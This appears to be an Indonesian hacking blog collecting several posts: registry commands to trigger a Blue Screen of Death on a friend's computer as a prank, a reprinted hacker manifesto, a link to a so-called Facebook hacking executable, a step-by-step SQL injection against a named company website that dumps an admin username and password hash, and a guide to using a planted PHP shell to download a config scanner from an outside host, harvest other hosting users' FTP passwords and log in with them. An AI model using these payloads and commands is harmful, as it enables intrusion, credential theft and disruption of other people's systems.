Labels: at 6:56 AM
BSOD atau Blue Screen Of Death adalah istilah populer untuk pesan error yang dikeluarkan OS Windows ketika mengalami error yang dianggap cukup serius.
Pesan Error tersebut muncul dengan backgound biru dan text berwarna putih.
upz, baca wiki aja dech.. nich http://id.wikipedia.org/wiki/Blue_Screen_of_Death

ini adalah contoh author pemalas, jangan ditiru yw.. :D

BSOD (biasanya) tidak disukai oleh pengguna Windows :D Beberapa orang menganggap hal ini sebagai kiamat dan tidak sedikit yang langsung mengambil jurus ampuh untuk mengusirnya: Install Ulang ^_^ Ya maklum ajah, pengguna awam mana yang nggak panik saat komputernya tidak berkutik dan hanya keluar tampilah biru-putih ^_^


Ingin ngerjain teman Anda dengan BSOD? Ternyata untuk membuatnya gampang kok :D Hanya perlu 2 tombol dan 3x tekan, maka BSOD akan langsung muncul dengan tampilan khasnya :D Sebelumnya Anda perlu melakukan sedikit perubahan pada Registry. Salin kode berikut kedalam text editor kesayangan Anda, pilih sesuai dengan keyboard komputer yang akan Anda kerjai:



USB Keyboard
echo Y|REG ADD HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Services\kbdhid\Parameters /v CrashOnCtrlScroll /t REG_DWORD /d 1


PS/2 Keyboard
echo Y|REG ADD HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Services\i8042prt\Parameters /v CrashOnCtrlScroll /t REG_DWORD /d 1



Pastikan kode diatas diketik dalam satu baris. Setelah itu simpan dengan nama TERSERAH.BAT kemudian Klik 2x. Restart komputer Anda.
Sesudahnya, Anda bisa memanggil Blue Screen Of death dengan cara kilat:

Tekan-Tahan tombol [Ctrl] sebelah kanan, dalam kondisi tombol [ctrl] masih ditahan, tekan tombol [Scroll Lock] dua kali.

Kurang lebihnya akan tampil BSOD seperti ini:

Blue Screen Of Death



Huff.. kalo misalnya Anda sedang males kerja atau males praktikum saat di Lab, pake cara ini ajah, bisa dijadikan alasan nich.. "Waduh pak, saya nggak bisa kerja nich, komputernya error melulu!" ---> hehehe.. just kidding, NOT RECOMENDED ^_^



Untuk menormalkan kembali:


USB Keyboard
echo Y|reg delete HKEY_LOCAL_MACHINE\SYSTEM\
CurrentControlSet\Services\kbdhid\Parameters /v CrashOnCtrlScroll


PS/2 Keyboard
echo Y|REG DELETE HKEY_LOCAL_MACHINE\SYSTEM\
CurrentControlSet\Services\i8042prt\Parameters /v CrashOnCtrlScroll

Selamat mencoba.. and.. happy BSOD!

Sumber : spyrozone.net
Inilah dunia kami...
Dunia elektron dan switch... Beauty of the baud...

Kalian menyebut kami penjahat... karena kami menggunakan layanan yang sudah ada tanpa membayar, padahal layanan itu seharusnya sangat murah jika tidak dikuasai oleh orang-orang rakus...

Kami kalian sebut penjahat... karena kami gemar menjelajah. Kami kalian sebut penjahat... karena kami mengejar ilmu pengetahuan. Kami ada tanpa warna kulit, tanpa kebangsaan, tanpa bias agama...

Tapi bagi kalian kami penjahat. Kami adalah penjahat...

Sedangkan kalianlah yang membuat bom nuklir, mengobarkan peperangan, membunuh, berbuat curang, berbohong, dan berusaha membuat kami percaya bahwa itu semua demi kebaikan kami...

Ya, aku adalah penjahat. Kejahatanku adalah keingintahuanku. Kejahatanku adalah menilai orang berdasarkan perkataan dan pikiran mereka, dan bukan berdasarkan penampilan mereka. Kejahatanku adalah menjadi lebih pintar dari kalian, sebuah dosa yang tak akan bisa kalian ampuni...

Aku adalah seorang hacker, dan inilah manifestoku. Kau bisa menghentikan satu, tapi kau tak akan bisa menghentikan semuanya... bagaimanapun juga, kami semua sama...

(The Mentor, 8 Januari 1986)
Banyak artikel-artikel yang menulis tentang bagaimana cara melakukan hacking terhadap facebook, entah itu dengan cara phising, keyloger, ataupun dengan menggunakan Facebook Freeze. ketika kita mengetikkan keyword "facebook hack" di mesin pencari google, maka ratusan artikel yang menulis tentang facebook hack ini, kali ini saya tidak akan membahas mengenai teknik-teknik diatas, karna bagi saya teknik-teknik semacam itu peluang berhasilnya adalah 50 - 50.

Setelah beberapa hari melakukan pencarian di google, saya menemukan sebuah tools yang cukup ampuh untuk melakukan hack terhadap facebook, tools ini dibuat dengan menggunakan Java, dan cukup simpel digunakan. Jika teman-teman berminat silahkan download toolsnya.

Download : facebookhackv10.exe

Labels: at 12:53 AM
Pada tulisan saya kali ini saya memilih untuk topik SQL Injection, karena belakangan ini banyak skali pemberitaan di media tentang pembobolan website-website pemerintahan yang saya pikir semuanya melewati bugs SQL Injection yang sangat fenomenal ini.

Karena tertarik dengan trik ini, saya mencoba untuk search beberapa keyword dalam google, yang saya khususkan buat pencarian website-website dengan domain .id . ada banyak website yang vuln terhadap SQL Injection, tapi kali ini saya khususkan pembahasan saya ke website www.suteki.co.id. Kenapa .. ? karna saya lihat produk-produk aplikasi yang di buat oleh perusahaan ini lebih terfokus pada sistem Akademik Kampus..

Ok, tanpa bertele-tele saya langsung saja pada pokok pembahasannya ( sebelumnya saya pamit pada Master-Master yang ada disini, mohon maaf jika trik ini basi bagi Anda semua, setidaknya saya ingin berbagi sedikit dengan teman-teman )

Yang perlu kita persiapkan :

1. 1 Unit Komputer ( terkoneksi ke internet tentunya )
2. Sedikit pemahaman tentang MySQL
3. Segelas Cofeemix ( heheh )
4. Sebungkus Sampoerna Mild

Let's Try .....

langkah pertama :
Buka Browser kesayangan anda ( saya make Mozilla ) dan ketikkan pada URL Address http://www.suteki.co.id.
tampak tampilan website ini yang begitu dinamis, dan tertata dengan rapi, pilih salah satu berita yang ada dalam website itu ..
http://www.suteki.co.id/index.php?pilihan=berita&aksi=detil&id=14 ( saya milih artikel dengan ID = 14 )

nah .. apa yang selanjutnya kita lakukan .. ?
ok, kita coba melakukan penetrasi dengan menggunakan Blind SQL Injection ( saya anggap teman-teman sudah paham dengan ini )

http://www.suteki.co.id/index.php?pilihan=berita&aksi=detil&id=14 ORDER BY 1/*
( lakukan COUNT ID hingga MySQL mengeluarkan pesan error )

http://www.suteki.co.id/index.php?pilihan=berita&aksi=detil&id=14 ORDER BY 2/*
….

http://www.suteki.co.id/index.php?pilihan=berita&aksi=detil&id=14 ORDER BY 8/*
akhirnya MySQL mengeluarkan pesan error :

Unknown column '8' in 'order clause'
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/iketus/public_html/fungsi.php on line 1950


Artinya .. MySQL tidak menemukan field yang bernilai 8 ( kalo salah mohon koreksinya ).

Setelah langkah diatas, kita bisa melanjutkan aksi BLIND SQL Injection kita …

http://www.suteki.co.id/index.php?pilihan=berita&aksi=detil&id=-14 union select 1,2,3,4,5,6,7/*

( kita menambahkan perintah UNION untuk menggabungkan 2 perintah select dalam database)
Sebelumnya perlu kita ketahui bahwa MySQL menganggap perintah UNION valid jika field yang di pilih (SELECT) bernilai sama antara table 1 dengan table lainnya..

Dari injection yang kita masukkan tadi di atas, akan tampil beberapa angka yang kita masukkan tadi dalam website tersebut ( angka antara 1 – 7), nah angka yang muncul itu akan kita gunakan untuk menampilkan data-data yang berada dalam database server.. ( username dan password tentunya .. hehehe )

Tapi … kita kan gak tau database atau table-table yang ada di dalamnya … ?

Langkah Kedua :

Sebelum kita lanjutkan, mungkin ada baiknya anda cari referensi tentang MySQL di google untuk syntax-syntax :

Table_name
Information_schema.tables
Information_schema.columns
Table_schema
Column_name


OK, kita lanjutkan..
Setelah kita mendapatkan angka “sakti” dalam website itu, sekarang kita mencari informasi database dan table yang digunakan untuk data website itu dengan menggunakan syntax-syntax diatas tadi…

( kita tampilkan datanya lewat field ke-3 (dalam hal ini, angka 3 adalah angka “sakti” yang muncul pada website tersebut) ).

http://www.suteki.co.id/index.php?pilihan=berita&aksi=detil&id=-14%20union%20select%201,2,table_name,4,5,6,7%20from%20
information_schema.tables%20where%20table_schema=database()%20limit%2020,100/*

(injection diatas berguna untuk menampilkan nama-nama table yang ada dalam database yang digunakan .. limit 0,10 berguna untuk menampilkan batas dari table-table yang akan ditampilkan)

Ok, setelah URL diatas kita jalankan, kita bias melihat ada table yang menarik dari banyaknya table yang di tampilkan website itu… hehehhe, tentunya table user yang mungkin saja berisi username dan password.

Berikutnya, setelah kita mendapatkan nama dari table yang berisi password, sekarang kita coba explore field-field apa saya yang berada dalam table user tersebut, dengan injection :

http://www.suteki.co.id/index.php?pilihan=berita&aksi=detil&id=-14%20union%20select%201,2,column_name,4,5,6,7%20from%20
information_schema.columns%20where%20table_name='user'/*

LOH .. !! kok error .. ?
Iya, ketika url di atas dijalankan akan muncul pesan error di browser anda…

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'user\'/*' at line 4


Itu berarti magic quote dalam server itu di aktifkan … so ….
Ada banyak jalan menuju Roma … hehehe…
Kita convert string user ke karakter HEX … ( silahkan anda search di google, website yang menyediakan tools untuk konversi tersebut )
Setelah di konversi user = 75736572 ..
Jgn lupa untuk menambahkan 0x sebelum karakter HEX untuk user dalam injection kita, yang nantinya akan seperti 0x75736572,…

http://www.suteki.co.id/index.php?pilihan=berita&aksi=detil&id=-14%20union%20select%201,2,column_name,4,5,6,7%20from%20
information_schema.columns%20where%20table_name=0x75736572/*

setelah kita menjalankan injection seperti diatas , maka akan muncul field-field dari table user, dan sepertinya ada 2 field yang menarik untuk kita lihat .. hehehe, tentu saja field NAMA dan PASSWORD ..

Langkah Ketiga :

Masukan url berikut untuk meng-injeksi username dan passwordnya
http://www.suteki.co.id/index.php?pilihan=berita&aksi=detil&id=-14%20union%20select%201,2,concat(NAMA,0x3a,PASSWORD),4,5,6,7%20from user/*
(fungsi concat disini untuk menampilkan data lebih dari satu, dan karakter 0x3a adalah karakter HEXA untuk karakter ; sebagai pemisah antara NAMA dan PASSWORD )
Hasil dari injection diatas akan menampilkan USERNAME dan PASSWORD dari table user :

superadmin:4b791eae459638f7


ternyata passwordnya di encrypt ( mungkin memakai encrypt MD5 ) silahkan di crack….hehehe

Demikian akhir dari tulisan saya … semoga bias bermanfaat untuk teman-teman semua …
Mohon maaf jika kurang bermutu, sebab sayapun tidak akan berhenti untuk belajar …
NB : Tulisan ini hanya sebagai bahan pembelajaran, saya tidak bertanggung jawab atas segala akibat yang ditimbulkan oleh tulisan ini …
Labels: at 12:41 AM

Sebelumnya saya pamit dulu kepada para Master-Master yang membaca Artikel ini, mungkin artikel ini sudah pernah di bahas sebelumnya,
saya hanya mencoba untuk mengingatkan kembali, atau paling tidak membagi sedikit pengetahuan kepada rekan-rekan sekalian.

Dalam artikel ini kita akan mencoba mencari dan mendapatkan password dari user yang berada pada suatu hosting server,
dengan bermodalkan shell hasil injectan kita, sapa tau kita bisa mendapatkan password sebenarnya dari user tersebut.



CATATAN : Saya tidak bertanggung jawab atas penyalah gunaan artikel ini, semuanya hanyalah untuk proses pembelajaran

Ok, tanpa basa-basi saya mulai saja.

Yang perlu di persiapkan :
1. Seperti biasa, komputer yang terkoneksi ke internet.
2. Shell atau website hasil injectan kita. ( saya anggap rekan-rekan sudah tau gimana cara mendapatkannya )
3. Source untuk Scan file-file configurasi yang memuat informasi user dan password. dapat di download di http://wances.100webspace.net/tools/sConfig.txt
4. Segelas Cofeemix dan Sebungkus Sampoerna Mild. heheh

Praktek :
1. Buka Shell atau website injectan anda, ( catatan : file ini harus di upload ke dalam server yang akan kita scan user nya )
Contoh : http://www.xxxhosting.us/phpwebsite/images/javascript/wysiwyg/display.php ( sebelumnya saya sudah upload phpshell ke dalam server tersebut )
2. Download file sConfig.txt dari hhttp://wances.100webspace.net/tools/sConfig.txt ( file ini bisa berada dimana saja dalam server target, tentunya dalam folder yang mempunyai permission terhadap user yang kita gunakan skarang )
wget http://wances.100webspace.net/tools/sConfig.txt

###############################################################################
wget http://wances.100webspace.net/tools/sConfig.txt
–03:59:52– http://wances.100webspace.net/tools/sConfig.txt
=> `sConfig.txt’
Resolving wances.100webspace.net… done.
Connecting to wances.100webspace.net[64.72.112.169]:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: unspecified [text/plain]

0K ….. 184.39 KB/s

03:59:52 (184.39 KB/s) - `sConfig.txt’ saved [6042]
###############################################################################

Setelah sukses men-download file sConfig.txt, rename file tersebut menjadi sConfig.php ( source codenya dalam bentuk PHP )

3. Jalankan file tersebut,
php sConfig.php

################################################################################
mv sConfig.txt sConfig.php
php sConfig.php
Content-type: text/html
X-Powered-By: PHP/4.3.10



[+] Founded 224 entrys in /etc/passwd
[+] Founded 224 readable public_html directories
[~] Searching for passwords in config.* files…

[+] /home/bavmus/public_html/main/include/config.php
dbbavas
[+] /home/business/public_html/LINKEXCHANGE/siteadmin/config.php

…………………….
…………………….

[+] /home/etnkyus/public_html/config.php
133798
[FTP] etnkyus:133798 Success

…………………..

################################################################################

Bingoo !!!, kita sudah mendapatkan 1 dari sekian banyak user yang ada dalam server tersebut. selanjutnya kita coba connect ke server itu dengan user dan password yang telah kita dapatkan tadi..

########################################################################
ftp> open
To xx.xx.xx.250
Connected to xx.xx.xx.250.
220———- Welcome to Pure-FTPd [TLS] ———-
220-You are user number 1 of 50 allowed.
220-Local time is now 04:19. Server port: 21.
220 You will be disconnected after 15 minutes of inactivity.
User (xx.xxx.xx.250:(none)): etnkyus
331 User etnkyus OK. Password required
Password:
230-User etnkyus has group access to: etnkyus
230 OK. Current restricted directory is /
ftp>
########################################################################

ada kemungkinan user dan password yang sama di gunakan dalam Cpanel website tersebut, so, silahkan dicoba sendiri.

Demikian Artikel singkat saya, semoga bermanfaat, Terus Mencoba, dan jangan takut gagal.

Zionn designed by ZENVERSE | Converted by Blogger Template Place Collaboration One-4-All